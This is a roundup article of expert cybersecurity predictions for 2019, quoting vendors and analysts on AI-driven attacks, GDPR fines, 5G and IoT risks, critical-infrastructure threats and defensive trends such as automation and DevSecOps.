pic: Getty Images
From AI-driven chat-bots to Zero-day mining as a service, via Fuzzing and the impact of 5G, the successes and failures of GDPR, loss of faith in the public internet, dire warnings on critical infrastructure vulnerabilities to complexity and the IOT, the predicted rise and predicted fall of data breaches, Sim-jacking and skills shortage tipping point, the need for ROI, the death of privacy, our biggest threat identified as failure to evolve and a host of novel new threats and solutions, this year’s New Year predictions are more extensive than ever.
While cyber-security is fact-based, it also leverages educated guesses by subject experts extrapolating high-level insider-knowledge, observations, analysis and experience, and that’s exactly what our roundup of predictions for 2019 provide.
And if any suggestions seem unlikely - this piece is being written while Gatwick International Airport is closed for a second evening due to drone-attack. These predictions cover both the positive and negative, and in some cases are contradictory; our industry’s job is to bring about the positive, and by being forewarned, prevent or at least mitigate the impact of the negative.
Happy New Year!
AI-driven chatbots go rogue: "Cyber-criminals and black hat hackers will create malicious chatbots on legitimate sites to socially engineer unknowing victims into clicking malicious links, downloading files containing malware, or sharing private information." – WatchGuard Threat Lab.
AI will be used by hackers for most sophisticated cyber-attack ever: "Next year will see the first AI-orchestrated attack take down a FTSE100 company. Creating a new breed of AI powered malware, hackers will infect an organisations system using the malware and sit undetected gathering information about users’ behaviours, and organisations systems. Adapting to its surroundings, the malware will unleash a series of bespoke attacks targeted to take down a company from the inside out. The sophistication of this attack will be like none seen before, and organisations must prepare themselves by embracing the technology itself as a method of hitting back and fight fire with fire." – Jason Hart, CTO, Data Protection at Gemalto.
Artificial intelligence (AI) and machine learning (ML) for adversarial usage: Cyber-criminals have attained a decent level of proficiency in practical AI/ML usage. Most of the time, they use the emerging technology to better profile their future victims and to accelerate time, and thus effectiveness, of intrusions. As opposed to many cyber-security startups who often use AI/ML for marketing and investor-relationship purposes, the bad guys are focused on its practical, pragmatic usage to cut their costs and boost income. We will likely see other areas of AI/ML usage by cybercriminals. We will probably have the first cases of simple AI technologies competing against each other in 2019." – Ilia Kolochenko, CEO, High-Tech Bridge.
AI-powered security solutions increasingly adopted to fight escalating threats: "One in four IT pros believe artificial intelligence will have the biggest impact on their business…. to recognise and respond to cyber-threats in real time. Nearly 30 percent of enterprises with 1,000+ employees are currently using AI-powered security solutions, and this number is expected to grow to more than 60 percent by 2020." – Spiceworks research.
AI drives complexity of attacks: "The complexity of attacks will continue to grow as criminals increasingly use artificial intelligence (AI) to conduct their schemes. Banks will receive more fines for money laundering because they will have a decreased ability to protect themselves. Rogue regimes will also use AI to achieve their cyber-crime goals, including election fraud, social media manipulation, money laundering and more. Perhaps worst of all, AI-enabled money laundering will create a greater flow of money to criminal organisations to finance narcotrafficking, human trafficking and terror attacks. On the bright side, new advances and AI technologies will help financial organisations, critical infrastructure, and enterprises to better protect themselves if they choose to deploy such systems." – Mark Gazit, CEO, ThetaRay.
AI and Machine learning combat alert volumes: "Alert volume and fatigue will continue to challenge enterprise security teams in the year ahead. Automating processes through AI and ML will allow security teams to focus on deep investigations, without being bogged down by the sheer volume of incoming information. Increased automation will be critical to reduce fatigue, allow faster detection and deliver better security outcomes." – Anthony Di Bello, senior director, security solutions, OpenText.
AIOps goes from buzzword to baller: "Many core infrastructure platforms have started taking advantage of predictive analytics to improve the datacentre in recent years. Like everything else." – Brad Parks, VP of business development, Morpheus Data.
AI’s absence of real cyber-security will become exposed: "If AI is about reproducing cognition, does cyber-security AI really exist? How will attackers capitalise on a slowdown of AI funding? When we trust in algorithms and analytics to successfully pilot automobiles, provide insight into healthcare decisions and alert security professionals to potential data loss incidents, how far should that trust go?" – Forcepoint.
AI/Machine learning use by adversaries: "Attackers will start to leverage Adversarial machine learning in their attacks to bypass security products reliant exclusively on machine learning for detection of malware." – Dmitri Alperovitch, CTO, CrowdStrike.
Ancient breaches will increasingly come to light: "It takes roughly 100 days from the time a breach occurs to evidence of the attack being detected and the longer the breach, the more data that is stolen and the more users that are affected, the costlier it is. As organisations adopt machine learning based advanced analytics and security orchestration and automation (SOAR) technology, the mean time to detection will fall and more breaches that are greater than 100 days old, perhaps even longer, coming to light. In 2019, organisations will get better at identifying them. – SecureAuth.
AppSec transformation takes off: "2019 will be the year CISOs, CIOs and CSOs all view DevSecOps as one of their top three investment priorities - and permanently change the way we think about AppSec, and who an AppSec professional is. Responsibility for AppSec will be handed over to Heads of Development, as it transforms officially into DevSec, where identification and remediation lie. 75 percent of developers will begin expecting security intelligence about their code to come from GitHub plugins - and across the development lifecycle. AppSec must live where developers live, and developers must understand security. 2019 will usher this in as non-negotiable business imperative. …. 2019 will set in motion, a massive three to five year transformation that will leave current AppSec professionals out of a job by 2024, unless they seriously understand DevOps." – Derek Weeks, VP and DevOps Advocate, Sonatype.
APT and targeted attacks continue to rocket: "We expect a continued uplift and increased technical sophistication as APTs grow in confidence and scope. In addition, non-nation-state targeted attacks, carried out by groups such as Cobalt Gang or Anunak/Carbanak, are also likely to see an increase. Threat intelligence is one tool in a deep defence model which allows for enhanced threat mitigation." – Jose Miguel Esparza, head of threat intelligence at Blueliv.
APTs renew focus on banks: "We expect advanced persistent threats to continue emerging, with a renewed focus on the banking sector, reminiscent of the Carbanak group making headlines in 2014 for using an APT-style campaign to steal money from banks." – Bitdefender.
Attribution of attackers by the US to increase: "It can be difficult to attribute cyber activity with 100 percent certainty – (and) US government officials were also concerned about public demands to respond if they were to attribute an attack. Until recently, the US just didn’t have the tools needed to respond effectively. And many cyber-incidents in recent years were just not worth going to war over. But tools are improving and the US is getting better at other kinds of non-cyber responses, like creating a more robust sanctions regime and criminal indictments. The US is already less afraid of attribution – which we saw last spring when it announced sanctions against Russia in response to attacks on US critical infrastructure. As we continue to improve our non-cyber responses and further develop our cyber-toolbox, we’ll see that the US is less hesitant and more aggressive when it comes to calling out attackers." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Attack threats and methods become ever more more sophisticated: "The public cloud will experience a massive security attack that shakes the confidence of all users. Hijack ransoms (of IOT devices), which make a service unavailable until a ransom is paid and IoT device ransoms, which could force not just companies but also individuals to pay on the spot ransoms to regain control.
"The rise of the nation state availability-based attacks will accelerate. Organised groups will create widespread disruption, either as solo endeavours or in conjunction with armed conflicts. Expect more governments to be embarrassed, shamed and manipulated, as well as face physical disruption to services.
"DDoS swarmbots and hivenets will come of age. Cyber-criminals will upgrade IoT-based botnets with swarm-based technology to create more efficient attacks….which can make autonomous decisions with minimal supervision, and use their collective intelligence to opportunistically and simultaneously target vulnerable points in a network. Hivenets are self-learning clusters of compromised devices that simultaneously identify and tackle different attack vectors... use swarm intelligence to act together, recruit and train new members to the hive." – Radware.
Autonomous vehicles drive enormous - potentially vulnerable - data creation: "Cars are on the cusp of Level 3 autonomy, so we can anticipate new workflows for the test vehicles as they push forward from this point. Watch for other vehicles to become autonomous as well in land, sea, and air. Data storage in the form of flash, disk, tape, and the cloud – and the ability to seamlessly move data between these types of storage to balance access and cost factors – will be a key underlying technology supporting automotive vehicle development." – Eric Bassier, senior director, product management and product marketing, Quantum.
Automation-first mindset will propel the DevOps agenda: "As every company becomes a software company in 2019, more and more investment will be placed on an agile DevOps strategy, fuelled by the need to automate. This automation-first mindset will be a major change for most IT teams and will need to be driven by the CIO, along with an injection of fresh talent or a major investment in training for existing IT teams. CIOs should avoid developing their own technology as much as possible. DevOps is about automation, but there are a growing number of excellent tools that engineers can string together to be successful. After a good DevOps model has been adopted by the CIO of an organisation, it’s important to transition to a mindset where the team learns how to leverage existing technologies instead of developing all on their own." – Jesper Frederikson, VP, Okta.
Automation passes the tipping point: "Network administration will be impossible to do without the ability to automate. Not only is it being widely adopted, we’re seeing the adoption of automation across the spectrum of security solutions." – Reuven Harrison, CTO, Tufin.
Automation. Organisations will employ more automation to combat threats: "Organisations need to rethink their strategy to better anticipate threats and to combat the economic motivations forcing cyber-criminals back to the drawing board. Organisations need to embrace automation and AI to shrink the windows from intrusion-to-detection and from detection-to-containment. ... by integrating security elements into a cohesive security fabric that dynamically shares threat information for broad protection and visibility across every network segment from IoT to multi-clouds." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Biometric authentication sees major hack, boosting MFA: "Hackers will take advantage of the false sense of security (biometric authentication) encourages and crack a biometric-only login method at scale to pull off a major attack. As a result, 2019 will see strong growth in the use of multi-factor authentication (MFA) ...particularly push-based authentication and MFA for Cloud application defence." – WatchGuard Threat Lab.
Biometrics - cyber-criminals ‘stealing our faces: "Biometric identification (including facial recognition software) will be exploited to steal our identities, thereby raising the question of what really defines an identity." – Forcepoint.
Biometrics adoption ubiquitous, but passwords remain: "86 percent of organisations will use utilise some form of biometric authentication technology by 2020. But...only 23 percent of IT pros believe biometric authentication will replace traditional text-based passwords in the next two to three years. (Hence) biometric authentication will have to exist side-by-side with traditional passwords — perhaps as a secondary form of authentication." – Spiceworks research.
Blackouts caused by targeted ransomware focused on utilities and ICS: "Targeted ransomware campaigns will cause chaos in 2019 by targeting industrial control systems and public utilities for larger payoffs. The average payment demand will increase by over 6,500 percent, from an average of US$ 300 to US$ 20,000 per attack. These assaults will result in real-world consequences like city-wide blackouts and the loss of access to public utilities." – WatchGuard Threat Lab.
Blockchain adoption rates will double in large enterprises: "25 percent of large enterprises with 5,000+ employees are currently using blockchain-enabled tech. By the end of 2019, we expect blockchain usage in large enterprises to almost double to 48 percent. And by 2020, 56 percent of large enterprises expect to use blockchain in one form or another. Many businesses will likely use private blockchains to share data among other trusted organisations for use cases such as tracking items through a supply chain and proving email isn’t spam." – Spiceworks research.
Boards now acknowledge importance of cyber-security: "Major attacks (are) encouraging members of the C-suite to start asking questions of their own security posture. Meanwhile, the threat of GDPR non-compliance has added an extra fear factor. The potential financial, reputational and business costs mean that 2019 will see CEOs, CFOs and Legal breaking down silos within companies, and assess how integral cyber-security is to their business strategy. From the other direction, CIOs, CISOs and CTOs will encourage both their peers and the rest of the company to understand the importance of a robust security posture." – Jose Miguel Esparza, head of threat intelligence at Blueliv.
Breaches will only get worse: "2018 wasn’t too kind to companies on the data security front. ... – 2019 will only be worse, fondly remembered for producing a record-number of application outages. Highly complex IT environments and applications are being placed under more pressures every day. Pressure to upgrade, improve, comply and critically, move to the cloud. All this will place a huge burden on already over-stretched IT teams and resources to shift left;, to upgrade, migrate and test applications, faster. And threat actors have learned that disrupting a business is just as profitable as exfiltrating data, with ransomware and malware….With the General Data Protection Regulation (GDPR) in play, companies that succumb to the pressure will pay large fines. The first big test of GDPR will be a PR disaster for the unfortunate organisation concerned; not only can they expect to receive the full force of GDPR, the incident will gain far more media coverage than normal and will cause significant brand damage." – Eric Schrock, CTO at Delphix.
Brexit impact on IOT security landscape: "In March, the Department for Digital, Culture, Media and Sport (DCMS) and the National Cyber Security Centre (NCSC) launched its Code of Practice for Consumer Internet of Things (IoT) Security for manufacturers. ….(and it) could be a way for the UK to safeguard its users and businesses in preparation for the post-Brexit state of online affairs. Organisations and institutions should look to deploy an IoT management platform, which provides flexible and scalable identity issuance and management for strong authentication beyond static credentials. Being able to see and secure all IoT devices within one platform is the only way for organisations to take stock of their vulnerable points and adopt measures needed to safeguard them. A key component of this will be digital certificates, which organisations should make use of in order to guarantee the authenticity of their websites. I foresee that they will take their place in business best practices, and UK organisations will be able to forestall an ever-evolving threat landscape such as sophisticated phishing and Business Email Compromise (BEC) attacks amongst others." – Jeremy Boorer, head of EMEA, Sectigo.
Certificates - EV SSL vs. DV SSL impact user confidence in websites: "With free Domain Validation (DV) SSL certificates now available, phishing attacks using these certificates have risen exponentially, as they can now display their phishing site as "Secure", with the result that victims will think the website is safe. However, a browser’s definition of secure is not the same as the common definition of safe. By placing an identifier of the site operator’s genuine identity in the interface of the browser, Extended Validation (EV) SSL complicates the phisher’s task considerably and allows users to spot the difference between one that is real vs. fake. As a result, we will continue to see businesses up their levels of both consumer protection and confidence online by implementing EV certificates." – Tim Callan, senior fellow, Sectigo.
Chat-phish evolves: "Phishing attempts will rapidly evolve, with attackers designing AI-enabled chatbots that can hold a conversation and lure the target into clicking a phishing link. Hackers will explore a wide range of payloads, including manipulation of orders, installation of a remote access trojan, or even extortion." – Bharat Mistry, principal security architect, Trend Micro.
China increases cyber-espionage: "China will continue to ramp up commercial cyber espionage efforts as trade war escalates." – Dmitri Alperovitch, CTO, CrowdStrike.
CIO turnover will increase: "If the CIO cannot deliver, there will be a breakdown in the business relationship and the CEO will look to others to lead the tech agenda. However, those CIOs that are seeing success will advance to even more influential C-level roles at their existing organisations, or move on to the next IT challenge." – Forrester.
Cloud applications will increasingly be specifically targeted: "As more enterprises shift workloads and data to applications like Office 365 and Workday, hackers will start to craft new attacks specific to those apps. Expect to see hackers use special exploits to gain access to the application itself, rather than just user data." – Stan Lowe, CISO, Zscaler.
Cloud. Private cloud takes off: "We’ll see more hybrid environments where private cloud is hosted by a public cloud provider." – Reuven Harrison, CTO, Tufin.
Containers and serverless adoption will make security shift left, but cloud data leaks will continue to grow: "Relying more and more on cloud providers for infrastructure services and adopting microservices and ephemeral serverless functions, the focus will be on application security and how to integrate security on DevOps CI/CD. After the basic S3 buckets were left open to the public with confidential data, we will see more data lake leaks as many enterprises are migrating to the cloud. Misconfigurations on databases, Elastic Search Clusters or Hadoop Clusters will expose big data." – Sergio Loureiro, director cloud solutions, Outpost24.
Cloud. Federation isn’t just for Star Trek: "Debates over public vs. private clouds or AWS vs. Azure have given way to an acceptance that the world is both Hybrid Cloud (on and off-premises) and multi-cloud (taking advantage of multiple platforms). 2019 will see increasing interest in next-gen private clouds as well as increasing need for centralised governance over independent cloud estates. This also means enterprises will be more and more open to wander from the grip of traditional hardware and hypervisor players to find solutions." – Brad Parks, VP of business development, Morpheus Data.
Complexity of corporate IT networks grows exponentially: "Lack of visibility across corporate IT assets... is accountable for the majority disastrous data breaches occurred in 2018. The problem will almost certainly persist and exacerbate in 2019. Most modern companies and organisations have very complicated, convoluted and intricate IT infrastructure composed of unconnectable pieces, often located across the world. Shadow systems co-exist with legacy mainframes, abandoned cloud applications and third-party code unmaintained since years. Obviously, such unknown or semi-known systems cannot be protected or secured in any manner. Consequently, they become a very attractive target to run ransomware, phishing or even highly-sophisticated targeted attacks by cyber-criminals. The complexity of corporate networks is growing exponentially, as it does, so will the problem of visibility. …(making the)... perfect environment to harvest new data breaches and security incidents, let alone non-conformities with GDPR and other regulations." – Ilia Kolochenko, CEO, High-Tech Bridge.
Configuration - the end of the era of direct administration: "By manually configuring/manually updating your deployments – you could be your company’s own worst enemy. Because errors will continue to happen, these manual processes will no longer be permitted. Intermediaries will be needed for any and all configuration changes." – Reuven Harrison, CTO, Tufin.
Containerisation drives App/infrastructure decoupling: "The notion of segmentation moves from the network to the realm of containers. The continual decoupling of application from infrastructure gives new freedoms... immutable infrastructure will take off." – Reuven Harrison, CTO, Tufin.
Crowd security testing morph to penetration testing: "Bug bounties are trying to reinvent themselves in light of emerging startups in the field and not-for-profit initiatives such as the Open Bug Bounty project. Most crowd security testing companies now offer highly-restricted bug bounties, available only to a small circle of privileged testers. Others already offer process-based fees instead of result-oriented fees. We will likely see crowd security testing ending up as a peculiar metamorphose of classic penetration testing." – Ilia Kolochenko, CEO, High-Tech Bridge.
Credential theft will continue to rise: "Whether its due to highly targeted phishing campaigns, information being passed on to third parties, or machine learning and artificial intelligence being deployed as the next attacking vector, we’ll continue to see soaring figures of breaches in 2019, if advanced identity-security approaches are not taken." – SecureAuth.
"Credential leaks" reduce due to GDPR: "Or at the very least (fewer) make headlines. Security incidents will be more thoroughly contained at an organisation level in an effort to avoid penalties that could force a business into bankruptcy." – Bitdefender.
Critical infrastructure attacks harder to stop due to inter-dependence: "As we move to embrace virtual infrastructure, we are also abandoning that physical redundancy, making it easier for an attacker to have cascading impacts that can cause real damage. With fewer physical controls in place it will be harder to regain control of systems, minimise damage and stop an attack from progressing. It’s important that we realistically assess our dependence upon cyber and the potential consequences of a disruptive attack. Maintaining physical backups or other redundancies, changing operational processes, and even keeping less data can reduce the impact of a successful attack." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Critical infrastructure large-scale attack in UK: "2019 could be the year that we see a large-scale cyber attack on the UK’s critical national infrastructure. The proliferation of internet-connected devices in that infrastructure means there are more opportunities for cyber-criminals to attack. Many of these devices are poorly secured, and pose serious risks to both businesses and individuals. Smart energy meters installed in millions of homes, will leave householders vulnerable to cyber-attacks... artificially inflating meter readings, (or)...worse case, ...something more sinister – a catastrophic attack on our electricity grid. – James Wickes, CEO, Cloudview.
Critical infrastructure attack deterrents lessen: "The things that have been holding back Russia, China, North Korea and Iran from a critical infrastructure attack on the U.S. could shift. At the moment, Russia and China have the highest capabilities, but they fall lower on the scale of destructive intent. Of the group, they’re more rational and more dependent on their own critical infrastructure. On the other hand, North Korea and Iran have higher destructive intent, but fall lower on the capabilities scale. But it won’t stay this way forever. The level of destructive intent of Russia and China could change overnight – which is a concern given the capabilities they already have. And North Korea and Iran are strengthening their capabilities every day. Unsophisticated attackers will get better at breaking into OT Networks, but will likely lack the level of sophistication needed to have a significant physical impact. Russia’s attacks on the Ukrainian power grid, attackers had to thoroughly understand the operations at the targeted plant. That level of sophistication can’t be bought and sold on the internet, which means that the real damage will continue to be done by actors with access to the right skills and resources." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Critical infrastructure threats are not going away, but there is hope: "(Industrial) devices will likely remain an attractive target for those who want to have an impact on the physical world until we come to a place where the security of process control networks (PCN), supervisory control and data acquisition (SCADA) systems, and other industrial control systems (ICS) is put at a higher priority than the ease of use of those systems. Strict access controls and steps to mitigate the threat from malicious insiders would go a long way toward addressing these issues." – ThreatConnect research team.
Cryptocurrency - security disillusionment sets in: "Millions of people have lost their money in cryptocurrencies in 2018. Many due to crypto-exchange hacks or fraud, others were victims of sophisticated spear-phishing targeting their e-wallets, some simply lost their savings with the Bitcoin crash. (Unfortunately)... many victims irrecoverably lost their confidence in blockchain technology in general. It will be time-consuming to restore their trust and convince them to leverage blockchain in other areas of practical applicability. (But)... potential future-victims are now paranoid and won’t be a low-hanging fruit for fraudsters." – Ilia Kolochenko, CEO, High-Tech Bridge.
Crypto-jacking – the new currency: "More and more hackers will hijack cloud accounts to mine cryptocurrency. This helps to save on purchasing the necessary resources and computing power required to mine successfully. Security teams will have a tough task detecting it though – an increase in crypto-jacking malware will occur in 2019, which minimises the risk of detection by throttling resource usage." – Bharat Mistry, principal security architect, Trend Micro.
Cyber-attack will cause the next public disaster: "The next target will be the UK’s power and telecoms networks. A successful sector-wide attack could cause major disruption to the country, switching off people’s lights, heat and communications. The real threat is that there doesn’t even have to be a large, well-funded terrorist organisation behind it. It could just be a lone gun with the right skills and software." – David Francis, head of security, KCom.
Cyber cold war arrives: "As opportunities for legitimate access (to new technology) dwindle, there will real incentive to acquire it by nefarious means." – Forcepoint.
Cyber-attacks smarter and more sophisticated: "For many criminal organisations, attack techniques are evaluated not only in terms of their effectiveness, but in the overhead required to develop, modify, and implement them. Many of their attack strategies can be interrupted by addressing the economic model employed by cyber-criminals. Strategic changes to people, processes, and technologies can force some cyber-criminal organisations to rethink the financial value of targeting certain organisations. One way that organisations are doing this is by adopting new technologies and strategies such as machine learning and automation to take on tedious and time-consuming activities that normally require a high degree of human supervision and intervention." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Cyber-criminals find the bar lowered: "Today, any lone hacker can easily acquire hacking tools online via underground hacking communities to attempt their own attacks on an organisation’s network. These communities work collaboratively and are happy to share the latest knowledge and industry intelligence -- along with the latest cyber-weapons – for free or at astonishingly low prices. And with search engines crawling the web 24/7 looking for connected devices and systems with known vulnerabilities to exploit, the effort to find easy targets and gain access to the networks they are connected to is now minimal at best. Hackers have two all-important advantages: ease of access to the free-flowing communal knowledge and illicit tools within their underground communities; and the initiative to decide when and where to apply them. Companies must expect the numbers of cybercriminals to grow, enticed by easy access to guidance and cyber-weapons within underground hacker communities, and the promise of huge volumes of data that is easily monetised or, as in the case of the recent Marriott/Starwood data breach, of enormous potential value to an intelligence service." – Phil Celestini, chief security and risk officer, Syiverse.
DDoS defence spending remains a priority: "A combination of initiatives will be necessary; working with a strategic IT partner can help organisations of any size conduct comprehensive testing and analysis of vulnerabilities to ensure the best levels of prevention against potential threats." – John Williams, product manager, Node.
Defences will become more sophisticated using a range of techniques: Advanced Deception Tactics. "Integrating deception techniques into security strategies to introduce network variations built around false information will force attackers to continually validate their threat intelligence, expend time and resources to detect false positives, and ensure that the networked resources they can see are actually legitimate. Unified Open Collaboration. An effective way to keep up with (criminals making minor changes such as changing IP addresses) is by actively sharing threat intelligence. Open collaboration efforts between threat research organisations, industry alliances, security manufacturers, and law enforcement agencies will significantly shorten the time to detect new threats by exposing and sharing the tactics used by attackers. ... applying behavioural analytics to live data feeds through open collaboration will enable defenders to predict the behaviour of malware." Speed, Integration, and Automation. Use of automation or machine learning requires: "a means to collect, process, and act on threat information in an integrated manner to produce an intelligent response (creating a security fabric) to find and respond to threats at speed and scale. Integration of point products deployed across the distributed network, combined with strategic segmentation will significantly help." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Device as a Service (DaaS) use to increase: "The trend from two-factor to multi-factor authentication on personal devices will continue to grow as security industry bodies like the FIDO Alliance integrate with Windows Hello to enable safer authentication. The rise of smart devices in the home and office that are all interconnected will also introduce security vulnerabilities that will need to be addressed. Companies will need to understand their multi-generational workforce, to better manage and protect devices, as well as develop strong security protocols and practices. Device as a Service (DaaS) will help tackle the security issues of (this) increasingly mobile workforce." – Preben Fjeld, general manager, Lenovo UK.
DevOps collides with cloud management: "The Dev side of the DevOps equation has been moving fast and as the harbinger of digital transformation, DevOps-centric organisations are going to refuse to accept the status quo. IT teams will either embrace and leverage next-generation cloud management to enable developers or they will find themselves wondering what happened to their domain. The same is true for cloud management tools. Ops-centric tools are no longer going to cut it. – Brad Parks, VP of business development, Morpheus Data.
DevOps adoption rates will continue to grow: "More security ‘experts’ will be moved into the DevOps project teams, resulting in a significant increase in a DevSecOps mindset across these enterprises, realising that security is the responsibility of everyone involved in the CI/CD process and not just the IT security team. This will result in a bigger uptake of tools and processes that better support this transformation. Yet there will be an increase in the number of large breaches resulting directly from the reuse of 3rd party or open source software libraries….partly due to the shorter development times the customer markets demand." – Simon Roe, application security product manager, Outpost24.
Digital certificates will evolve: fueled by automation and innovation. "Private, public, and email (S/MIME) certificates, driven by their proven importance to both organisations and users, will become the norm. This means that enterprises will look to manage the lifecycles of all of their certificates from one pane of glass, and that the industry must work to quickly identify and remove from service certificates used for nefarious purposes. …. user safety education and authenticity guarantees will go a long way towards protecting users on the web." – Bill Holtz, CEO, Sectigo.
Digital transformation growth boosts cloud migration security specialists: "As organisations embrace digital transformation, the process of migrating to the cloud has never been under more scrutiny. 2019 will see the rise of a new role for the channel – the Cloud Migration Security Specialist. (Companies will) need help protecting themselves from threats." – Gary Marsden, cloud security solutions, data protection, Gemalto.
Encryption increases as phone-home IOT exploited: "The main problem with 'Phone Home' IoT devices is that their 'Home' can be spoofed. ... - often brought to market too early because they can be upgraded in the field using 'Phone Home'. When 'Home' is spoofed they can be 'upgraded' to whatever the attacker wants. The most common case is leaving the functionality as is, but adding a backchannel proxy so that the attacker can enter an organisation and appear to be on the organisation's network. (GDPR will help drive change)….. I expect to see organisations taking more pro-active steps; first to ensure that there is more encryption of cloud data, and secondly to reduce the number of people that can access that data in the first place." – Andy Harris, CTO, Osirium.
Election interference in Europe: "2019 is the year Europe elects Members of the European Parliament. If recent developments in the US are any indication, we should expect turmoil in Europe, including state-sponsored attacks on voting systems, social media propaganda, and other forms of "meddling." If a few years ago these acts were merely rumored to be occurring, events in the past two years alone confirm that the world’s leading powers will stop at nothing to influence their adversaries’ political outcomes." – Bitdefender.
Election security isn’t bad and it will only get better (in US): "We’re in far better shape today than we were in 2016. I was in charge of cyber and infrastructure security at DHS (Department of Homeland Security, USA) when we officially designated election infrastructure as critical infrastructure. Most security researchers focus on the security of the voting machines themselves, but so much more comes into play and needs to be protected: voter registration databases, the process of loading ballots into the machines, vote tabulation, getting results to the Secretaries of State and to the news networks. ...As awareness has grown, progress has been made – but there’s still much more to be done ... particularly with regard to influence operations from Russia and potentially other adversaries, where the necessary whole-of-nation coordinated response has been absent." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Employment - Favourable job market for IT pros in 2019: "A low unemployment rate and positive GDP growth in the US and parts of Europe bode well for tech workers. ….30 percent of employers plan to grow their IT departments in 2019 (and) ..one in four IT pros plan to look for a new job in 2019; 62 percent of IT pros seeking new employment are doing so primarily to earn a higher salary; 36 percent of IT pros expect to get a raise and 16 percent expect a promotion." – Spiceworks research.
Evolution - inability to evolve is the biggest cyber-security threat: "There isn’t one specific threat that could be deemed the "biggest" in 2019. That said, although adversaries rapidly evolve, the same isn’t necessarily true for their targets making them a big threat to businesses. It seems that every year, we, as an industry, work to improve cyber-hygiene and educate our staff, and advance our tools, but that it is proving to not be enough. This is where threat intelligence comes into play. Employees and cyber-security organisations that fail to evolve and address the specific threats facing their organisation -- based on the industry they operate in, data they safeguard, organisations they interact with, etc. -- will ultimately pose the greatest risk to that organisation." – ThreatConnect Research Team.
’Fire Sale’ attacks move from fiction to reality: "In the Die Hard movie series, a ‘fire sale’ was a fictional three-pronged cyber attack, targeting a city or state’s transportation operations, financial systems, public utilities and communication infrastructure. Modern cyber security incidents suggest that nation-states and terrorists have developed these capabilities, so 2019 may be the first year one of these multi-pronged attacks is launched to cover up a hidden operation." – WatchGuard Threat Lab.
Fuzzing by criminals increases zero-days: "Strategies will include artificial intelligence fuzzing (AIF), traditionally a sophisticated technique used in lab environments by professional threat researchers to discover vulnerabilities in hardware and software interfaces and applications. (They do this by injecting invalid, unexpected, or semi-random data into an interface or program and then monitoring for events such as crashes, undocumented jumps to debug routines, failing code assertions, and potential memory leaks). As machine learning models are applied to this process we predict that this technique will not only become more efficient and tailored, but available to a wider range of less technical individuals. They will be able to accelerate the process of discovering zero-day vulnerabilities, which will lead to an increase in zero-day attacks targeting different programs and platforms." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
5G increases IoT system exploits and botnet recruitment: "As the number of IoT devices rises (up to about 7 billion worldwide at the moment), and we deploy 5G to connect everything, we’ll see a huge increase in the use of IoT devices for DDoS attacks, phishing, ransomware, and cryptomining. The Reaper IoT botnet of 2017 was an example of the power that criminals can amass with IoT devices. With the addition of 5G and increased compute power, the risk is only going to become greater." – Stan Lowe, CISO, Zscaler.
5G will spur new security concerns: "5G mobile networks are on the horizon ….these new networks will bring with them a host of new security concerns. 5G will spur further growth of internet-connected devices—Ericsson already estimates that there could be 3.5 billion IoT-enabled devices by 2023—providing would-be intruders with new endpoints to attack. Security for 5G is still evolving with the standard, and it is complex enough that security will require several layers. 5G networks can be split into uniquely purposed slices, each virtual network slice could demand unique security capabilities. Developers will need to consult IoT security professionals to help identify new ways to shore up the network, and ensure that security measures are implemented as the technology develops, instead of having to address issues retrospectively." – Jason Soroko, chief technology officer of IoT, Sectigo.
GDPR bounty hunters arrive: "We haven’t seen even the tip of the iceberg when it comes to hackers targeting big firms with this type of extortion. ...The angle these attackers take is by extorting their data and telling the victim that they now have two choices, a) pay the ICO fine of up to €20 million or b) pay the hackers fee of far less and not have to deal with reputation damage." – Jake Moore, cyber security expert, ESET UK.
GDPR - we’ll see the first big fine: "The period of grace is drawing to a close, and the new year will see the ICO taking its first high-profile scalp over treatment of personally identifiable information. That will set the precedent by which all further cases are judged – letting companies know along the way just how strictly enforced the rules are going to be, and how heavy the fines." – David Francis, head of security, KCom.
GDPR questioned by big business: "Businesses will begin to question GDPR (following the first major fine) and, by 2020, we predict up to 75 percent of new business applications will have to make the hard decision of choosing between compliance and security." – Bharat Mistry, principal security architect, Trend Micro.
GDPR to bite: "2019 will see the GDPR really cut its teeth, both from a fining perspective and from a court case point of view. Supervisory authorities...have already begun issuing fines and enforcement notices under GDPR, and we expect to see this activity increase significantly during next year. There is a strong likelihood that we’ll see a maximum fine (€20 million or four percent of total revenue) dealt to an organisation, given some of the investigations that are currently ongoing." – Sam Humphries, senior product marketing manager, global markets and compliance, Rapid7.
GDPR - breaches appear to rise: "As GDPR continues to be implemented, we will see a perceived rise in the number of breaches. However, we will be uncertain if this should be attributed to an increase breach disclosure or an increase in actual breaches, or that breaches against personal data have become financially attractive." – Martin Jartelius, CSO, Outpost24.
GDPR’s negative impacts: "Many companies and organisations are now frustrated with GDPR and spend virtually all their resources to attain formal compliance. The problem is that in pursue of the paper-based compliance, they omit critical aspects of practical cyber-security. Consequently, we may see more data breaches, as scant cyber-security resources...cannot effectively cover both practical security and compliance requirements. Even if compliance and security are tangential, contiguous and even intertwined areas, they are still different and cannot replace each other." – Ilia Kolochenko, CEO, High-Tech Bridge.
Hacktivism / influence operations expand beyond the political realm: "Hacktivism, or more commonly known as influencer operations, is when consumers are directed toward a certain stance or feeling on a given issue using false or compromised information. As information and influence operations leveraging a cyber-component have seemingly exponentially increased over the last few years, this most likely is going to continue and expand to issues existing outside of the political realm. Whether leveraging compromised data or strictly propaganda or false information, all variety of actors can use information operations to further their personal or organisational goals. A competing retailer could post scores of negative reviews for a competitor in hopes of ultimately driving down that organisation’s business. Similarly, a nation-state could minimise competition for its domestic companies by conducting information operations targeting foreign organisations." – ThreatConnect research team.
Hypervisor - first serious attack predicted: "Hypervisors and other cloud service provider-controlled infrastructure needs to be hardened to give security-conscious enterprises the confidence that they remain in control of their data. One problem technically for Full Drive Encryption is that when running on a virtual machine with keys in the virtual memory, it’s possible that a hypervisor could take a snap-shot of the memory of the virtual machine, and make a copy of the disk encryption keys. The solution is to use the hardware based memory encryption that not even a compromised hypervisor could access in plain text." – Garry McCracken, VP technology, WinMagic.
